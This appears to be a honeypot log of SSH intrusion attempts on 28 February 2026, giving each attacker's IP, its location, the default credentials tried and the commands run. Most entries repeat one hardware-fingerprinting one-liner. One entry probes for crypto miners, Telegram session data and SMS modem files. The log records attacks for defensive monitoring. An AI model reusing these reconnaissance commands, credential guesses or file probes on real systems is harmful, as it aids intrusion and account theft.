🎭 lotus_root_4 (139.59.58.2) — Bengaluru, India · 13 sessions · 52 cmds

2026-02-28 20:19 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 13x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×13

$ uname -s -v -n -m 2 > /dev/null ×13

$ uname -m 2 > /dev/null ×13

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×13

🎭 wraith_root_51 (165.245.184.64) — Singapore, Singapore · 4 sessions · 16 cmds

2026-02-28 20:11 EST · as admin/password, root/12345678, root/qwerty

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 yankee_root_2 (134.199.201.50) — Douglasville, United States · 20 sessions · 80 cmds

2026-02-28 18:33 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 20x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×20

$ uname -s -v -n -m 2 > /dev/null ×20

$ uname -m 2 > /dev/null ×20

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×20

🎭 stroopwafel_root_13 (161.35.81.56) — Amsterdam, Netherlands · 2 sessions · 8 cmds

2026-02-28 20:06 EST · as root/admin, root/toor

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 rogue_root_55 (139.59.121.105) — Singapore, Singapore · 3 sessions · 12 cmds

2026-02-28 19:13 EST · as admin/admin, pi/raspberry, ubuntu/ubuntu

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 outback_root_8 (209.38.85.119) — Sydney, Australia · 3 sessions · 12 cmds

2026-02-28 19:20 EST · as root/12345678, root/admin, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 seoul_root_13 (222.104.120.107) — Pohang, South Korea · 1 session · 9 cmds

2026-02-28 19:21 EST · as root/admin

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 crumpet_root_8 (144.126.196.40) — Slough, United Kingdom · 4 sessions · 16 cmds

2026-02-28 19:12 EST · as admin/admin123, root/1234, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 reef_root_11 (170.64.221.73) — Sydney, Australia · 3 sessions · 12 cmds

2026-02-28 18:46 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 spice_root_21 (206.189.128.159) — Bengaluru, India · 3 sessions · 12 cmds

2026-02-28 18:37 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 poutine_root_5 (68.183.203.18) — Toronto, Canada · 3 sessions · 12 cmds

2026-02-28 18:35 EST · as root/12345678, root/admin, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 monsoon_root_19 (139.59.34.191) — Bengaluru, India · 3 sessions · 12 cmds

2026-02-28 17:52 EST · as admin/admin, pi/raspberry, ubuntu/ubuntu

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 poutine_root_6 (159.203.63.81) — Toronto, Canada · 3 sessions · 12 cmds

2026-02-28 17:46 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 tea_root_17 (159.65.89.61) — Slough, United Kingdom · 1 session · 4 cmds

2026-02-28 17:52 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 roo_root_7 (170.64.184.183) — Sydney, Australia · 2 sessions · 8 cmds

2026-02-28 17:50 EST · as root/1234, root/admin123

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 roo_root (170.64.170.196) — Sydney, Australia · 10 sessions · 10 cmds

2026-02-28 17:11 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 10x across 10 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×10

🎭 gouda_root_3 (188.166.78.26) — Amsterdam, Netherlands · 10 sessions · 40 cmds

2026-02-28 15:54 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 spice_root_22 (139.59.88.184) — Bengaluru, India · 12 sessions · 48 cmds

2026-02-28 16:46 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 12x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×12

$ uname -s -v -n -m 2 > /dev/null ×12

$ uname -m 2 > /dev/null ×12

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×12

🎭 fog_root_16 (142.93.32.235) — Slough, United Kingdom · 5 sessions · 20 cmds

2026-02-28 16:34 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

